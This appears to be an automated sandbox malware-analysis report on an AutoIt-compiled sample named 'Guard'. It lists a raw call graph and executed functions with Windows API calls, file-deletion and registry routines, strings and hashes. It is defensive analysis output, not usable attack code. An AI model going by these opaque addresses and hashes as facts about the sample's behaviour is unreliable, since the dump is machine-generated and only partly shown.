100078->100080 100087 37555a 100080->100087 100081->99538 100085->100077 100086->100081 100088 37557d 100087->100088 100089 375569 100087->100089 100092 374c5d __flush 78 API calls 100088->100092 100095 375579 100088->100095 100104 378d58 58 API calls __getptd_noexit 100089->100104 100091 37556e 100105 378fe6 9 API calls __write_nolock 100091->100105 100094 375589 100092->100094 100106 380da7 100094->100106 100103 375635 LeaveCriticalSection LeaveCriticalSection __wfsopen 100095->100103 100098 374906 __filbuf 58 API calls 100099 375597 100098->100099 100110 380c32 100099->100110 100101 37559d 100101->100095 100102 372f85 _free 58 API calls 100101->100102 100102->100095 100103->100081 100104->100091 100105->100095 100107 375591 100106->100107 100108 380db4 100106->100108 100107->100098 100108->100107 100109 372f85 _free 58 API calls 100108->100109 100109->100107 100111 380c3e _flsall 100110->100111 100112 380c4b 100111->100112 100113 380c62 100111->100113 100136 378d24 58 API calls __getptd_noexit 100112->100136 100115 380ced 100113->100115 100117 380c72 100113->100117 100165 378d24 58 API calls __getptd_noexit 100115->100165 100116 380c50 100137 378d58 58 API calls __getptd_noexit 100116->100137 100120 380c9a 100117->100120 100121 380c90 100117->100121 100139 37d436 100120->100139 100138 378d24 58 API calls __getptd_noexit 100121->100138 100122 380c95 100166 378d58 58 API calls __getptd_noexit 100122->100166 100126 380ca0 100128 380cbe 100126->100128 100129 380cb3 100126->100129 100127 380cf9 100167 378fe6 9 API calls __write_nolock 100127->100167 100163 378d58 58 API calls __getptd_noexit 100128->100163 100148 380d0d 100129->100148 100133 380c57 _flsall 100133->100101 100134 380cb9 100164 380ce5 LeaveCriticalSection __unlock_fhandle 100134->100164 100136->100116 100137->100133 100138->100122 100140 37d442 _flsall 100139->100140 100141 37d491 EnterCriticalSection 100140->100141 100143 379e3b __lock 58 API calls 100140->100143 100142 37d4b7 _flsall 100141->100142 100142->100126 100144 37d467 100143->100144 100145 37d47f 100144->100145 100168 37a05b InitializeCriticalSectionAndSpinCount 100144->100168 100169 37d4bb LeaveCriticalSection _doexit 100145->100169 100170 37d6f3 100148->100170 100163->100134 100164->100133 100165->100122 100166->100127 100167->100133 100168->100145 100169->100141 100171 37d6fe 100170->100171 100175 37d713 100170->100175 100172 378d24 __write_nolock 58 API calls 100171->100172 100186 362cc7 100185->100186 100190 362ddb 100185->100190 100187 370fe6 Mailbox 59 API calls 100186->100187 100186->100190 100589 356981 100596 35373a 100589->100596 100591 356997 100605 357b3f 100591->100605 100593 3569bf 100594 35584d 100593->100594 100617 3ba48d 89 API calls 4 library calls 100593->100617 100597 353746 100596->100597 100598 353758 100596->100598 100618 35523c 59 API calls 100597->100618 100599 353787 100598->100599 100600 35375e 100598->100600 100619 35523c 59 API calls 100599->100619 100602 370fe6 Mailbox 59 API calls 100600->100602 100604 353750 100602->100604 100604->100591 100606 36162d 59 API calls 100605->100606 100607 357b64 _wcscmp 100606->100607 100608 357b98 Mailbox 100607->100608 100609 361a36 59 API calls 100607->100609 100608->100593 100610 38ffad 100609->100610 100611 3617e0 59 API calls 100610->100611 100612 38ffb8 100611->100612 100620 353938 68 API calls 100612->100620 100614 38ffc9 100616 38ffcd Mailbox 100614->100616 100621 35523c 59 API calls 100614->100621 100616->100593 100617->100594 100618->100604 100619->100604 100620->100614 100621->100616 100622 364d83 100623 364dba 100622->100623 100624 364e37 100623->100624 100625 364dd8 100623->100625 100662 364e35 100623->100662 100627 3a09c2 100624->100627 100628 364e3d 100624->100628 100629 364de5 100625->100629 100630 364ead PostQuitMessage 100625->100630 100626 364e1a DefWindowProcW 100636 364e28 100626->100636 100677 35c460 10 API calls Mailbox 100627->100677 100631 364e65 SetTimer RegisterWindowMessageW 100628->100631 100632 364e42 100628->100632 100633 364df0 100629->100633 100634 3a0a35 100629->100634 100630->100636 100631->100636 100639 364e8e CreatePopupMenu 100631->100639 100637 3a0965 100632->100637 100638 364e49 KillTimer 100632->100638 100640 364eb7 100633->100640 100641 364df8 100633->100641 100680 3b2cce 97 API calls _memset 100634->100680 100645 3a096a 100637->100645 100646 3a099e MoveWindow 100637->100646 100647 365ac3 Shell_NotifyIconW 100638->100647 100639->100636 100667 365b29 100640->100667 100648 3a0a1a 100641->100648 100649 364e03 100641->100649 100643 3a09e9 100678 35c483 291 API calls Mailbox 100643->100678 100652 3a096e 100645->100652 100653 3a098d SetFocus 100645->100653 100646->100636 100654 364e5c 100647->100654 100648->100626 100679 3a8854 59 API calls Mailbox 100648->100679 100655 364e0e 100649->100655 100656 364e9b 100649->100656 100650 3a0a47 100650->100626 100650->100636 100652->100655 100657 3a0977 100652->100657 100653->100636 100674 3534e4 DeleteObject DestroyWindow Mailbox 100654->100674 100655->100626 100664 365ac3 Shell_NotifyIconW 100655->100664 100675 365bd7 107 API calls _memset 100656->100675 100676 35c460 10 API calls Mailbox 100657->100676 100662->100626 100663 364eab 100663->100636 100665 3a0a0e 100664->100665 100666 3659d3 94 API calls 100665->100666 100666->100662 100668 365bc2 100667->100668 100669 365b40 _memset 100667->100669 100668->100636 100670 3656f8 87 API calls 100669->100670 100672 365b67 100670->100672 100671 365bab KillTimer SetTimer 100671->100668 100672->100671 100673 3a0d6e Shell_NotifyIconW 100672->100673 100673->100671 100674->100636 100675->100663 100676->100636 100677->100643 100678->100655 100679->100662 100680->100650 100681 359a6c 100684 35829c 100681->100684 100683 359a78 100685 3582b4 100684->100685 100692 358308 100684->100692 100687 3553b0 291 API calls 100685->100687 100685->100692 100690 3582eb 100687->100690 100688 390ed8 100688->100688 100689 358331 100689->100683 100690->100689 100693 35523c 59 API calls 100690->100693 100692->100689 100694 3ba48d 89 API calls 4 library calls 100692->100694 100693->100692 100694->100688 100695 38e463 100696 35373a 59 API calls 100695->100696 100697 38e479 100696->100697 100698 38e4fa 100697->100698 100699 38e48f 100697->100699 100701 35b020 291 API calls 100698->100701 100707 355376 60 API calls 100699->100707 100706 38e4ee Mailbox 100701->100706 100703 38e4ce 100703->100706 100708 3b890a 59 API calls Mailbox 100703->100708 100704 38f046 Mailbox 100706->100704 100709 3ba48d 89 API calls 4 library calls 100706->100709 100707->100703 100708->100706 100709->100704 100710 36242b 100719 362058 100710->100719 100712 362466 100714 36343f 59 API calls 100712->100714 100713 36243c 100713->100712 100727 3635b9 59 API calls Mailbox 100713->100727 100718 362329 Mailbox 100714->100718 100716 36245a 100717 36343f 59 API calls 100716->100717 100717->100712 100720 3619e1 59 API calls 100719->100720 100726 362067 100720->100726 100721 39f67d 100728 3b0065 91 API calls 4 library calls 100721->100728 100723 39f68b 100724 36153b 59 API calls 100724->100726 100725 3620b7 100725->100713 100726->100721 100726->100724 100726->100725 100727->100716 100728->100723 100729 359a88 100732 3586e0 100729->100732 100733 3586fd 100732->100733 100734 390ff8 100733->100734 100735 390fad 100733->100735 100760 358724 100733->100760 100767 3caad0 291 API calls __cinit 100734->100767 100738 390fb5 100735->100738 100741 390fc2 100735->100741 100735->100760 100736 355278 59 API calls 100736->100760 100765 3cb0e4 291 API calls 100738->100765 100739 372f70 __cinit 67 API calls 100739->100760 100755 35898d 100741->100755 100766 3cb58c 291 API calls 3 library calls 100741->100766 100744 353c30 68 API calls 100744->100760 100745 391289 100745->100745 100746 3911af 100770 3cae3b 89 API calls 100746->100770 100749 358a17 100750 3539be 68 API calls 100750->100760 100755->100749 100771 3ba48d 89 API calls 4 library calls 100755->100771 100756 353f42 68 API calls 100756->100760 100757 3553b0 291 API calls 100757->100760 100758 361c9c 59 API calls 100758->100760 100760->100736 100760->100739 100760->100744 100760->100746 100760->100749 100760->100750 100760->100755 100760->100756 100760->100757 100760->100758 100761 353938 68 API calls 100760->100761 100762 35855e 291 API calls 100760->100762 100763 3584e2 89 API calls 100760->100763 100764 35835f 291 API calls 100760->100764 100768 35523c 59 API calls 100760->100768 100769 3a73ab 59 API calls 100760->100769 100761->100760 100762->100760 100763->100760 100764->100760 100765->100741 100766->100755 100767->100760 100768->100760 100769->100760 100770->100755 100771->100745

                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                    Function 003B4005 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 1527 3b4005-3b404c call 361207 * 3 call 370284 call 3b4fec 1538 3b404e-3b4057 call 361900 1527->1538 1539 3b405c-3b408d call 370119 FindFirstFileW 1527->1539 1538->1539 1543 3b408f-3b4091 1539->1543 1544 3b40fc-3b4103 FindClose 1539->1544 1543->1544 1546 3b4093-3b4098 1543->1546 1545 3b4107-3b4129 call 361cb6 * 3 1544->1545 1548 3b409a-3b40d5 call 361c9c call 3617e0 call 361900 DeleteFileW 1546->1548 1549 3b40d7-3b40e9 FindNextFileW 1546->1549 1548->1549 1562 3b40f3-3b40fa FindClose 1548->1562 1549->1543 1551 3b40eb-3b40f1 1549->1551 1551->1543 1562->1545
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00370284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00362A58,?,00008000), ref: 003702A4
                                                                                                                                                                                                                      • Part of subcall function 003B4FEC: GetFileAttributesW.KERNEL32(?,003B3BFE), ref: 003B4FED
                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 003B407C
                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?), ref: 003B40CC
                                                                                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 003B40DD
                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 003B40F4
                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 003B40FD
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001E.00000002.3387247442.0000000000351000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387124839.0000000000350000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387495039.00000000003E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387495039.0000000000406000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387596183.0000000000410000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387647691.0000000000419000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_350000_Guard.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                                                                                                                                    • String ID: \*.*
                                                                                                                                                                                                                    • API String ID: 2649000838-1173974218
                                                                                                                                                                                                                    • Opcode ID: 9acab23574d534bfa293c9b687ae806000f72e1c3ada8ffd9807317e9b2d835e
                                                                                                                                                                                                                    • Instruction ID: b43831594533d70bc5b5a92aaee20a4631fe5a203a46e07c7b6319c9401a9391
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9acab23574d534bfa293c9b687ae806000f72e1c3ada8ffd9807317e9b2d835e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AF318E310083859BC316FF60C8959EFB7ECBE91305F444E2DF6E586192EB20DA09C7A6
                                                                                                                                                                                                                    Function 0035B020 Relevance: 5.6, APIs: 3, Instructions: 1146COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00363740: CharUpperBuffW.USER32(?,004171DC,00000000,?,00000000,004171DC,?,003553A5,?,?,?,?), ref: 0036375D
                                                                                                                                                                                                                    • _memmove.LIBCMT ref: 0035B68A
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001E.00000002.3387247442.0000000000351000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387124839.0000000000350000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387495039.00000000003E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387495039.0000000000406000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387596183.0000000000410000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387647691.0000000000419000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_350000_Guard.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: BuffCharUpper_memmove
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2819905725-0
                                                                                                                                                                                                                    • Opcode ID: dcd1713ca37a3797d89a8146597228f03e22af8375665038466908ff38a291d2
                                                                                                                                                                                                                    • Instruction ID: 229d5760c766e09dfbfdced3d787e1dc5b1f276b285c5a8f999564020027e746
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dcd1713ca37a3797d89a8146597228f03e22af8375665038466908ff38a291d2
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 65A277B46087418FCB22CF18C480B2AF7E5BF89304F15895DE89A8B761D775ED49CB92
                                                                                                                                                                                                                    Function 003B494A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(?,0039FC86), ref: 003B495A
                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 003B496B
                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 003B497B
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001E.00000002.3387247442.0000000000351000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387124839.0000000000350000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387495039.00000000003E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387495039.0000000000406000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387596183.0000000000410000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387647691.0000000000419000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_350000_Guard.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileFind$AttributesCloseFirst
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 48322524-0
                                                                                                                                                                                                                    • Opcode ID: e364174ad57e50b4c0f75b613d9ab4341645b31afc4799ff9518d06ec0653861
                                                                                                                                                                                                                    • Instruction ID: fb9cacfb7178fd46e35f5a9846e483fcfceefade84c747184d4c839aa1507899
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e364174ad57e50b4c0f75b613d9ab4341645b31afc4799ff9518d06ec0653861
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9EE02631810505AB8226673CEC8D8EB779C9F0637DF100B05FA35C64E1FBB09D8486DA
                                                                                                                                                                                                                    Function 003627FC Relevance: 47.5, APIs: 12, Strings: 15, Instructions: 298COMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 567 3627fc-362828 call 370fe6 * 2 572 3629a4 567->572 573 36282e-362837 567->573 576 3629ac-3629b1 572->576 574 362862-362874 call 3739fb 573->574 575 362839-36283b 573->575 578 36283c 574->578 581 362876-362888 call 3739fb 574->581 575->578 576->578 580 36283e 578->580 582 362840-362845 580->582 581->576 588 36288e-3628a0 call 3739fb 581->588 584 362857-36285f 582->584 585 362847-362856 call 37105c * 2 582->585 585->584 594 3628a6-3628b8 call 3739fb 588->594 595 39fb5b-39fb61 588->595 598 3628be-3628d0 call 3739fb 594->598 599 39fb66-39fb9d call 36436a call 362e8f call 362edc call 372e2c 594->599 595->578 604 3628d6-3628e8 call 3739fb 598->604 605 39fc2a-39fc35 598->605 631 39fbdd-39fbe0 599->631 632 39fb9f-39fbaa 599->632 613 3628ee-362900 call 3739fb 604->613 614 39fc75-39fc88 call 3b02fc 604->614 605->578 608 39fc3b-39fc4f call 36151f 605->608 618 39fc5f-39fc67 608->618 619 39fc51-39fc58 608->619 627 362902-362914 call 3739fb 613->627 628 36291a 613->628 629 39fc8a-39fcd6 call 361a36 * 2 call 362f3d call 3629be call 361cb6 * 2 614->629 630 39fce4-39fcec 614->630 618->578 624 39fc6d-39fc70 618->624 619->608 623 39fc5a 619->623 623->578 624->580 627->582 627->628 636 36291d-362929 call 363ebe 628->636 629->580 683 39fcdc-39fcdf 629->683 637 39fd02-39fd0f call 3aff5c 630->637 634 39fbe2-39fc01 call 37105c call 3aff5c 631->634 635 39fc06-39fc17 631->635 632->631 639 39fbac-39fbb3 632->639 634->578 653 39fc1c-39fc25 call 37105c 635->653 658 39fcee-39fcf3 636->658 659 36292f-362952 call 362edc call 362e8f call 3739fb 636->659 637->580 641 39fbcb-39fbd8 call 37105c 639->641 642 39fbb5-39fbb9 639->642 663 39fcff 641->663 642->641 649 39fbbb-39fbc9 642->649 649->653 653->578 658->582 665 39fcf9-39fcfa 658->665 677 3629b6-3629b9 659->677 678 362954-362966 call 3739fb 659->678 663->637 665->663 677->636 678->677 684 362968-36297a call 3739fb 678->684 683->580 687 362990-362999 684->687 688 36297c-36298e call 3739fb 684->688 687->582 690 36299f 687->690 688->636 688->687 690->636
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001E.00000002.3387247442.0000000000351000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387124839.0000000000350000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387495039.00000000003E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387495039.0000000000406000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387596183.0000000000410000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387647691.0000000000419000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_350000_Guard.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: __wcsnicmp$Exception@8Throwstd::exception::exception
                                                                                                                                                                                                                    • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                                                                                                                    • API String ID: 2660009612-1645009161
                                                                                                                                                                                                                    • Opcode ID: 28b3a555bb9d75d6e027253b8fa3db82c724cfa0a336d67517bda10e7df45c4a
                                                                                                                                                                                                                    • Instruction ID: 09765b584e724ffb9f8e324cc02f7c73a050fe5629da71decf821e0c07d12cbe
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 28b3a555bb9d75d6e027253b8fa3db82c724cfa0a336d67517bda10e7df45c4a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C2A1A031A00209ABCF27AF61CC42FBF37B8AF45740F158129F909AB29ADB759E11D750
                                                                                                                                                                                                                    Function 003629BE Relevance: 18.0, APIs: 4, Strings: 6, Instructions: 478COMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 972 3629be-3629e1 973 3629e7-362a19 call 363df7 call 363e47 972->973 974 39fd14-39fd27 call 3aff5c 972->974 981 362a1e-362a20 973->981 980 39fd2e-39fd43 call 3aff5c 974->980 988 39fd48-39fd50 980->988 981->980 983 362a26-362a9b call 361207 call 370b8b call 361207 call 370284 call 363ea1 call 36410a 981->983 983->988 990 362aa1-362b10 call 361207 * 2 call 370119 call 3617e0 SetCurrentDirectoryW call 361cb6 * 2 call 370fe6 call 36433f 983->990 988->990 991 39fd56-39fd80 call 3642cf call 3649c2 988->991 1046 362b14-362b19 990->1046 1006 39fda3-39fdba call 3aff5c 991->1006 1007 39fd82-39fd9c call 3b9b16 991->1007 1019 362c4c-362c7e call 361cb6 * 2 call 363e25 1006->1019 1016 39fdbf-39fe01 call 364a2f call 370fe6 1007->1016 1017 39fd9e call 364a2f 1007->1017 1036 39fe03-39fe12 1016->1036 1037 39fe14-39fe16 1016->1037 1017->1006 1040 39fe1a-39fe52 call 363613 call 36343f 1036->1040 1037->1040 1050 39fe58 1040->1050 1051 3a0032-3a006a call 363613 call 3b789a call 3bfc0d call 372f85 1040->1051 1048 362b1f-362b2f call 363ebe 1046->1048 1049 362c19-362c3c call 3642cf SetCurrentDirectoryW 1046->1049 1048->1049 1058 362b35-362b51 call 362e8f call 362dfe 1048->1058 1049->1019 1061 362c3e-362c4b call 37105c * 2 1049->1061 1056 39fe5c-39fe87 call 363613 call 3b79a4 1050->1056 1091 3a006c-3a007f call 363546 call 3a71dc 1051->1091 1077 39fe89-39fe9c 1056->1077 1078 39fea1-39feac call 3b798e 1056->1078 1079 362b57-362b6e call 362edc call 372e2c 1058->1079 1080 3a00d0-3a00e8 call 3aff5c 1058->1080 1061->1019 1082 39ffc1 1077->1082 1092 39fecd-39fed8 call 3b7978 1078->1092 1093 39feae-39fec8 1078->1093 1107 362b70-362b87 call 37386d 1079->1107 1108 362b8d-362b92 1079->1108 1080->1049 1084 39ffc5-39ffdc call 36343f 1082->1084 1084->1056 1099 39ffe2-39ffe8 1084->1099 1091->1019 1103 39feda-39feed 1092->1103 1104 39fef2-39fefd call 36368b 1092->1104 1093->1082 1105 3a0018-3a001a call 3b045f 1099->1105 1106 39ffea-39fff5 1099->1106 1103->1082 1104->1084 1124 39ff03-39ff1d call 3afef8 1104->1124 1117 3a001f-3a002c 1105->1117 1106->1105 1111 39fff7-3a0016 call 36314d 1106->1111 1107->1108 1127 362c81-362c8b 1107->1127 1115 3a00c3-3a00cb call 3afdb2 1108->1115 1116 362b98-362bd8 call 361a36 call 3627fc call 361cb6 1108->1116 1111->1117 1115->1080 1142 362bde-362be1 1116->1142 1143 362cac-362cb0 1116->1143 1117->1050 1117->1051 1135 39ff4c-39ff4f 1124->1135 1136 39ff1f-39ff4a call 361a36 call 361cb6 1124->1136 1127->1108 1130 362c91-3a00be 1127->1130 1130->1108 1139 39ff51-39ff6f call 361a36 call 362759 call 361cb6 1135->1139 1140 39ff83-39ff86 1135->1140 1173 39ff70-39ff81 call 363613 1136->1173 1139->1173 1145 39ff88-39ff91 call 3afe19 1140->1145 1146 39ffaa-39ffae call 3b793a 1140->1146 1147 362c9f-362ca7 1142->1147 1150 362be7-362bea 1142->1150 1143->1147 1164 3a0084-3a00b0 call 3aff5c call 37105c call 372f85 1145->1164 1165 39ff97-39ffa5 call 37105c 1145->1165 1153 39ffb3-39ffc0 call 37105c 1146->1153 1158 362c04-362c13 1147->1158 1154 362c96-362c99 1150->1154 1155 362bf0-362bff call 36314d 1150->1155 1153->1082 1154->1147 1163 362c9b 1154->1163 1155->1158 1158->1046 1158->1049 1163->1147 1164->1091 1165->1056 1173->1153
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00370B8B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00362A3E,?,00008000), ref: 00370BA7
                                                                                                                                                                                                                      • Part of subcall function 00370284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00362A58,?,00008000), ref: 003702A4
                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00362ADF
                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00362C2C
                                                                                                                                                                                                                      • Part of subcall function 00363EBE: _wcscpy.LIBCMT ref: 00363EF6
                                                                                                                                                                                                                      • Part of subcall function 0037386D: _iswctype.LIBCMT ref: 00373875
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001E.00000002.3387247442.0000000000351000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387124839.0000000000350000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387495039.00000000003E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387495039.0000000000406000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387596183.0000000000410000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387647691.0000000000419000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_350000_Guard.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                                                                                                                                                                    • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                                                                                                                                                    • API String ID: 537147316-3738523708
                                                                                                                                                                                                                    • Opcode ID: 572fde2cdfce4bbad380e9b8f46c7adb6a9c8fa684aebaec33bb9ca51f088964
                                                                                                                                                                                                                    • Instruction ID: 61651e036f2a6a4bbed98063c150e822e0001bd7235071a25678e44dd0fc7af1
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 572fde2cdfce4bbad380e9b8f46c7adb6a9c8fa684aebaec33bb9ca51f088964
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7202D5315083419FC726EF24C881AAFBBE5FF85314F14891DF49A9B2A2DB30D949CB52
                                                                                                                                                                                                                    Function 00362FC5 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 1181 362fc5-3630ea call 381b70 call 361207 call 3700cf call 3708c1 call 361900 call 364c94 call 361207 call 3619e1 RegOpenKeyExW 1198 3630f0-36310d call 361cb6 * 2 1181->1198 1199 3a01a3-3a01be RegQueryValueExW 1181->1199 1201 3a01c0-3a01ff call 370fe6 call 36433f RegQueryValueExW 1199->1201 1202 3a0235-3a0241 RegCloseKey 1199->1202 1215 3a021d-3a0223 1201->1215 1216 3a0201-3a021b call 361821 1201->1216 1202->1198 1204 3a0247-3a024b 1202->1204 1207 3a0250-3a0276 call 361609 * 2 1204->1207 1223 3a029b-3a02a8 call 372e2c 1207->1223 1224 3a0278-3a0286 call 361609 1207->1224 1217 3a0233 1215->1217 1218 3a0225-3a0232 call 37105c * 2 1215->1218 1216->1215 1217->1202 1218->1217 1233 3a02aa-3a02bb call 372e2c 1223->1233 1234 3a02ce-3a0308 call 361a36 call 364c94 call 361cb6 call 361609 1223->1234 1224->1223 1231 3a0288-3a0299 call 372fbd 1224->1231 1242 3a030e-3a030f 1231->1242 1233->1234 1243 3a02bd-3a02cd call 372fbd 1233->1243 1234->1198 1234->1242 1242->1207 1243->1234
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 003700CF: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00363094), ref: 003700ED
                                                                                                                                                                                                                      • Part of subcall function 003708C1: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,0036309F), ref: 003708E3
                                                                                                                                                                                                                    • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 003630E2
                                                                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 003A01BA
                                                                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 003A01FB
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 003A0239
                                                                                                                                                                                                                    • _wcscat.LIBCMT ref: 003A0292
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
